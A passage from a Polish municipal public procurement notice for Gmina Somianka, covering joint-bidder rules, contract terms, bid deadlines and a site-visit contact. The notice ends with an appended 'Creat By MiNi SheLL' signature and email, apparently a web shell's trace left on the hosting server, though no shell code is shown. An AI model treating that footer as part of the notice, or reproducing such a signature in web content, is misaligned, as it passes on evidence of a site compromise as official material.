Zamawiający winien dokonać zwrotu wadium.<br/>Więcej szczegółów znajduje się w rozdziale XIII SWZ &#34;Wymagania dotyczące wadium&#34; <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo <br/>do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. <br/>Pełnomocnictwo winno być załączone do oferty.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą <br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub <br/>usługi, do realizacji których te zdolności są wymagane.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty <br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi <br/>wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z <br/>postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/>(w przypadku wyboru ich oferty jako najkorzystniejszej) przedstawią Zamawiającemu <br/>umowę regulującą współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegóły odnośnie zakresu zmian umowy są zawarte w załączniku nr 9 do- SWZ Wzór Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-14 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie Zakupowej pod adresem: https://platformazakupowa.pl/pn/somianka</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-14 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Wykonawca musi przewidzieć wszelkie okoliczności, które mogą wpłynąć na cenę zamówienia, dlatego też zaleca się dokonanie wizji lokalnej terenu obejmującego przedmiot zamówienia i jego otoczenia oraz uzyskanie wszystkich niezbędnych informacji co do ryzyka, trudności i wszelkich innych okoliczności jakie mogą wystąpić w trakcie realizacji zamówienia<br/>2.Zamawiający uprzejmie informuje, że Wykonawcy będą mogli wykonywać czynności związane z wizją lokalną tylko w obecności wyznaczonego pracownika Gminy. Ze strony Zamawiającego osobą wyznaczoną do kontaktu, a także do uczestnictwa w wizji lokalnej będzie Pani Sylwia Mosakowska, tel: 29 741 87 90 wew. 54, e-mail: s.mosakowska@somianka.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com